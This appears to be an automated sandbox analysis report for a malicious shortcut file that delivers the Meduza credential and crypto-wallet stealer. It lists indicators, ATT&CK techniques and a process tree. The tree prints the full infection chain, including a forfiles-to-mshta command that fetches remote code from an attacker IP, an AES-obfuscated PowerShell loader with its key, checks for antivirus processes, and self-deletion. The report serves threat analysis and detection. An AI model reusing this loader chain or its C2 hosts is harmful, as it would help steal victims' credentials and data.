meduza | 85b317bb4463a93ecc4d25af872401984d61e9ddcee4c275ea1f1d9875b5fa61

Analysis

max time kernel
121s
max time network
124s
platform
windows7_x64
resource
win7-20231129-en
submitted
02-07-2024 10:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

config.lnk.mal.lnk
Size

1KB
MD5

c6d3234e6d234ac35340b68402d65f7d
SHA1

b6af26d59817c43729d48c46b9a4feee284f94eb
SHA256

85b317bb4463a93ecc4d25af872401984d61e9ddcee4c275ea1f1d9875b5fa61
SHA512

78794b7a77cd027b8dce320b6d1aaf918600a2d5c350ee676c705700a739fe7e55104ba29475ef6555adce4fec2ba0f13b0c9ca10d9730b7d8cfa44632d460b4

Score

10^/10

meduza collection defense_evasion discovery execution spyware stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://149.51.230.198:5566/config

Extracted

Family

meduza

89.169.54.70

Signatures

Meduza
Meduza is a crypto wallet and info stealer written in C++.
stealer meduza

Meduza Stealer payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2640-355-0x00000000004F0000-0x00000000005D9000-memory.dmp	family_meduza
behavioral1/memory/2640-357-0x00000000004F0000-0x00000000005D9000-memory.dmp	family_meduza

Meduza family
meduza
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

Paragraphs.pif

description pid process target process

PID 2376 created 1204 2376 Paragraphs.pif Explorer.EXE
Blocklisted process makes network request 2 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

3 2496 mshta.exe
6 1884 powershell.exe
Downloads MZ/PE file

description	pid	process	target process
PID 2376 created 1204	2376	Paragraphs.pif	Explorer.EXE

flow	pid	process
3	2496	mshta.exe
6	1884	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Paragraphs.pif

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\International\Geo\Nation	Paragraphs.pif

Executes dropped EXE 3 IoCs

Processes:

InvestmentsBreed.exeParagraphs.pifParagraphs.pif

pid process

1728 InvestmentsBreed.exe
2376 Paragraphs.pif
2640 Paragraphs.pif
Indirect Command Execution 1 TTPs 1 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
defense_evasion

Indirect Command Execution
T1202

Processes:

forfiles.exe

pid process

2892 forfiles.exe
Loads dropped DLL 2 IoCs

Processes:

cmd.exeParagraphs.pif

pid process

1412 cmd.exe
2376 Paragraphs.pif
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

pid	process
1728	InvestmentsBreed.exe
2376	Paragraphs.pif
2640	Paragraphs.pif

pid	process
2892	forfiles.exe

pid	process
1412	cmd.exe
2376	Paragraphs.pif

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

Processes:

Paragraphs.pif

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Paragraphs.pif
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Paragraphs.pif
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Paragraphs.pif
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Paragraphs.pif
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Paragraphs.pif

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1884 powershell.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 api.ipify.org
11 api.ipify.org
Enumerates processes with tasklist 1 TTPs 2 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2188 tasklist.exe
2868 tasklist.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Paragraphs.pif

description pid process target process

PID 2376 set thread context of 2640 2376 Paragraphs.pif Paragraphs.pif

pid	process
1884	powershell.exe

flow	ioc
9	api.ipify.org
11	api.ipify.org

pid	process
2188	tasklist.exe
2868	tasklist.exe

description	pid	process	target process
PID 2376 set thread context of 2640	2376	Paragraphs.pif	Paragraphs.pif

Drops file in Windows directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exetasklist.execmd.execmd.exetimeout.exeInvestmentsBreed.exefindstr.exetasklist.exefindstr.exefindstr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InvestmentsBreed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXEcmd.exe

pid process

2748 PING.EXE
2440 cmd.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1868 timeout.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

pid	process
2748	PING.EXE
2440	cmd.exe

pid	process
1868	timeout.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Paragraphs.pif

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Paragraphs.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Paragraphs.pif
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Paragraphs.pif

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

2044 NOTEPAD.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2748 PING.EXE

pid	process
2044	NOTEPAD.EXE

pid	process
2748	PING.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exeParagraphs.pifParagraphs.pif

pid	process
2888	powershell.exe
1884	powershell.exe
1884	powershell.exe
1884	powershell.exe
2376	Paragraphs.pif
2376	Paragraphs.pif
2376	Paragraphs.pif
2376	Paragraphs.pif
2376	Paragraphs.pif
2640	Paragraphs.pif

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exetasklist.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	2888	powershell.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeDebugPrivilege	2868	tasklist.exe
Token: SeDebugPrivilege	2188	tasklist.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

Paragraphs.pif

pid process

2376 Paragraphs.pif
2376 Paragraphs.pif
2376 Paragraphs.pif
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Paragraphs.pif

pid process

2376 Paragraphs.pif
2376 Paragraphs.pif
2376 Paragraphs.pif

pid	process
2376	Paragraphs.pif
2376	Paragraphs.pif
2376	Paragraphs.pif

pid	process
2376	Paragraphs.pif
2376	Paragraphs.pif
2376	Paragraphs.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeforfiles.exepowershell.exemshta.exepowershell.exeInvestmentsBreed.execmd.exeParagraphs.pif

description	pid	process	target process
PID 2988 wrote to memory of 2892	2988	cmd.exe	forfiles.exe
PID 2988 wrote to memory of 2892	2988	cmd.exe	forfiles.exe
PID 2988 wrote to memory of 2892	2988	cmd.exe	forfiles.exe
PID 2892 wrote to memory of 2888	2892	forfiles.exe	powershell.exe
PID 2892 wrote to memory of 2888	2892	forfiles.exe	powershell.exe
PID 2892 wrote to memory of 2888	2892	forfiles.exe	powershell.exe
PID 2888 wrote to memory of 2496	2888	powershell.exe	mshta.exe
PID 2888 wrote to memory of 2496	2888	powershell.exe	mshta.exe
PID 2888 wrote to memory of 2496	2888	powershell.exe	mshta.exe
PID 2496 wrote to memory of 1884	2496	mshta.exe	powershell.exe
PID 2496 wrote to memory of 1884	2496	mshta.exe	powershell.exe
PID 2496 wrote to memory of 1884	2496	mshta.exe	powershell.exe
PID 1884 wrote to memory of 2044	1884	powershell.exe	NOTEPAD.EXE
PID 1884 wrote to memory of 2044	1884	powershell.exe	NOTEPAD.EXE
PID 1884 wrote to memory of 2044	1884	powershell.exe	NOTEPAD.EXE
PID 1884 wrote to memory of 1728	1884	powershell.exe	InvestmentsBreed.exe
PID 1884 wrote to memory of 1728	1884	powershell.exe	InvestmentsBreed.exe
PID 1884 wrote to memory of 1728	1884	powershell.exe	InvestmentsBreed.exe
PID 1884 wrote to memory of 1728	1884	powershell.exe	InvestmentsBreed.exe
PID 1728 wrote to memory of 1412	1728	InvestmentsBreed.exe	cmd.exe
PID 1728 wrote to memory of 1412	1728	InvestmentsBreed.exe	cmd.exe
PID 1728 wrote to memory of 1412	1728	InvestmentsBreed.exe	cmd.exe
PID 1728 wrote to memory of 1412	1728	InvestmentsBreed.exe	cmd.exe
PID 1412 wrote to memory of 2868	1412	cmd.exe	tasklist.exe
PID 1412 wrote to memory of 2868	1412	cmd.exe	tasklist.exe
PID 1412 wrote to memory of 2868	1412	cmd.exe	tasklist.exe
PID 1412 wrote to memory of 2868	1412	cmd.exe	tasklist.exe
PID 1412 wrote to memory of 1388	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 1388	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 1388	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 1388	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 2188	1412	cmd.exe	tasklist.exe
PID 1412 wrote to memory of 2188	1412	cmd.exe	tasklist.exe
PID 1412 wrote to memory of 2188	1412	cmd.exe	tasklist.exe
PID 1412 wrote to memory of 2188	1412	cmd.exe	tasklist.exe
PID 1412 wrote to memory of 2644	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 2644	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 2644	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 2644	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 3016	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 3016	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 3016	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 3016	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 3052	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 3052	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 3052	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 3052	1412	cmd.exe	findstr.exe
PID 1412 wrote to memory of 2000	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 2000	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 2000	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 2000	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 2376	1412	cmd.exe	Paragraphs.pif
PID 1412 wrote to memory of 2376	1412	cmd.exe	Paragraphs.pif
PID 1412 wrote to memory of 2376	1412	cmd.exe	Paragraphs.pif
PID 1412 wrote to memory of 2376	1412	cmd.exe	Paragraphs.pif
PID 1412 wrote to memory of 1868	1412	cmd.exe	timeout.exe
PID 1412 wrote to memory of 1868	1412	cmd.exe	timeout.exe
PID 1412 wrote to memory of 1868	1412	cmd.exe	timeout.exe
PID 1412 wrote to memory of 1868	1412	cmd.exe	timeout.exe
PID 2376 wrote to memory of 2640	2376	Paragraphs.pif	Paragraphs.pif
PID 2376 wrote to memory of 2640	2376	Paragraphs.pif	Paragraphs.pif
PID 2376 wrote to memory of 2640	2376	Paragraphs.pif	Paragraphs.pif
PID 2376 wrote to memory of 2640	2376	Paragraphs.pif	Paragraphs.pif
PID 2376 wrote to memory of 2640	2376	Paragraphs.pif	Paragraphs.pif

outlook_office_path 1 IoCs

Processes:

Paragraphs.pif

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Paragraphs.pif

outlook_win_path 1 IoCs

Processes:

Paragraphs.pif

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Paragraphs.pif

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\config.lnk.mal.lnk
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2988
- - C:\Windows\System32\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta http://149.51.230.198:5566/config"
    3⤵
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory
    PID:2892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      . mshta http://149.51.230.198:5566/config
      4⤵
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2888
    - - C:\Windows\system32\mshta.exe
        
        "C:\Windows\system32\mshta.exe" http://149.51.230.198:5566/config
        5⤵
        Blocklisted process makes network request
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:2496
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ndqBmm($ZQgWz){return -split ($ZQgWz -replace '..', '0x$& ')};$qUhwqh = ndqBmm('246B95738A86E70E92019BE3E5F3C486209163C0BBE69EC80827A1D9F1EEEE673EF8F99B70AE1F748B7048E705401C98420C98EAA3BBDA3C59F46A42A796D49ADEE385A0FE94C3872561C4B33C0BBBFBC6E1E680C4476542E96645F14897A667B6E460D96E323FEA6668BF25925D136F9FCFDE60C7C3D99764DD5F46CFC4403A554C11FA80D4CAC0B8D196699CCE022A188858828A8E144066BC6BE111B2A7674D4A6B6950F63A07B22D50E351639A0AEB4C4A5263ECB323CAAB0796F661CA1E4465421B630E26223AD2931E7CD321BF31A03ACB457E2AC12BB758EDEC67ECD8ACDE51AB38A939BFE7D4E976F53574924B070B919939985FF20BB67B794C5B6B3B5E0385D753DC0B2183386F941463C94515E13447301E50A3F4E229F28FEEAD5D8F814393A263664743526EAC0EFC6185ECB77587E88126A85EC9488B5DD253B33B301C6AFDD4800293AC8D8037F0E3C116A1309AB9D41E03E5819A4F795827E25D0458736F7305FE6A8B784E46374A8D6DDD1D542FAF1C29AD1B409C5ACA8D7264E636C666EF8F76BAEF03FFC8862F43CF3F27663F9B3B5165701D4F8789DF4909F5E52E18605E37BEE5CA37F942625A0417F02D8BA90259B8014F447D4DDD73A4A1C07DAFB94218EB43E4D964053842CCBFD85DF100C4672327C796394F90A9C76ACE9BD63D9D86575DEC77CB59B610AF017F6858C4EB6CF3FF8FF769ECA24515205A2AC5C46D567C82F38A5FBC8971E54BB0F3C8EBE48B7F20C5A325A537FC6FC778149E1A9A56733E31E1975C882D05A22C9497B1A14262F5992080BBA06DB89E018CAAEEE7188FA5CAF31BCEBB48F7659B0AF89C45E0AF91281D392DF3BC1DB325BF5F33F9095D773C52410DFE62716F3857A1DBF2D42AC7467C9A1124D7CEB0C1965CE78C2D252B0E1CC59A4C5C7113ADA55A55313E2D85EE8FFCC0290E9317DF5173F0CBBC70691FFCCE8B46827A5ABC16177ECC24D32E6975B95761C62174F5B464F13D021294658147A0549E95792C267BC48344D69E607BAAF3CC888D1298325702DFA05C196114E87BC7ADAAE1F499453442E99E1BA05F99E90A000A01F5D3528133B005C34766B869DC7CC0A2B99BE61435BB3ADCCED8824D4BA5A04281A549237C948F56673BCAB7015F58697491E87694C813FDDB23E5021E4B23AEA165036EE0D60A3AF196A9BCE8FA6FF53CA7225657E801E8A82164C568F7682AFFD10DB420A34AAB55AC7B5083A75BD94D59DF06DA61550F38BC5FC5DCE69118A7F21301E8B8D67F91CFFDA707D7BD23E565A7F97503ED453EB768DFB4EF578D1CE1153FBDCE303F710E25221ABAB84BCC37EE1B7F0FA3A3EA34BD569DB5B078D48DFCF55CE0F2D5661C659F7766933015860CDA6DE803AA1B91B2FFFFB1AF24ADA90B863EC44BD0AF166240C646A365F19FA0132C0AAE5836457C72F8DBD30F1607F4B6E8918564B569156E76F9F946A0A412F89ABE2151BC26DEB7900D1ADB09B8BECB5E6256DDED76332652B7FC4E72831FB5C4BC83B2C75002B2D36D0624C2BB95470A40227E20108D3004767E94131DD164CD98A983CAFF96F9FFC53EA161A92A47B92E2324F119ACF00BFBBB49657A1B85D68D91DA4618BFAC7F0BB71425B006492881F75E125D7E0EAFA71DA01ACE32765F806CF37FA45CF934BA3010C4206F28BC6E349DDC698AFDB3A4BFC00C402B1C06A2DAC057F5AC99342F9492C39B12B8D89310A1C2185248617F5A09543B8994BCD15B43F8AC5018AF');$xBUYw = [System.Security.Cryptography.Aes]::Create();$xBUYw.Key = ndqBmm('44774952436A66544C6D696461734445');$xBUYw.IV = New-Object byte[] 16;$ZBFaMzDb = $xBUYw.CreateDecryptor();$pgKmpLJWC = $ZBFaMzDb.TransformFinalBlock($qUhwqh, 0, $qUhwqh.Length);$ZsrbzRYbp = [System.Text.Encoding]::Utf8.GetString($pgKmpLJWC);$ZBFaMzDb.Dispose();& $ZsrbzRYbp.Substring(0,3) $ZsrbzRYbp.Substring(3)
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1884
        
        C:\Windows\system32\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\config.txt
        7⤵
        Opens file in notepad (likely ransom note)
        
        PID:2044
        
        C:\Users\Admin\AppData\Roaming\InvestmentsBreed.exe
        
        "C:\Users\Admin\AppData\Roaming\InvestmentsBreed.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1728
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Bones Bones.cmd & Bones.cmd
        8⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1412
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2868
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1388
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2644
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 83263
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3016
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "ShowersFavoriteBuildingCompany" Squad
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3052
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Generates + Poetry + Photoshop + Afterwards + Builder + Conviction + Declined + Twin + Feet 83263\j
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\83263\Paragraphs.pif
        
        83263\Paragraphs.pif 83263\j
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2376
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        9⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1868
- C:\Users\Admin\AppData\Local\Temp\83263\Paragraphs.pif
  C:\Users\Admin\AppData\Local\Temp\83263\Paragraphs.pif
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - outlook_office_path
  - outlook_win_path
  PID:2640
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\83263\Paragraphs.pif"
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2440
  - - C:\Windows\system32\PING.EXE
      ping 1.1.1.1 -n 1 -w 3000
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

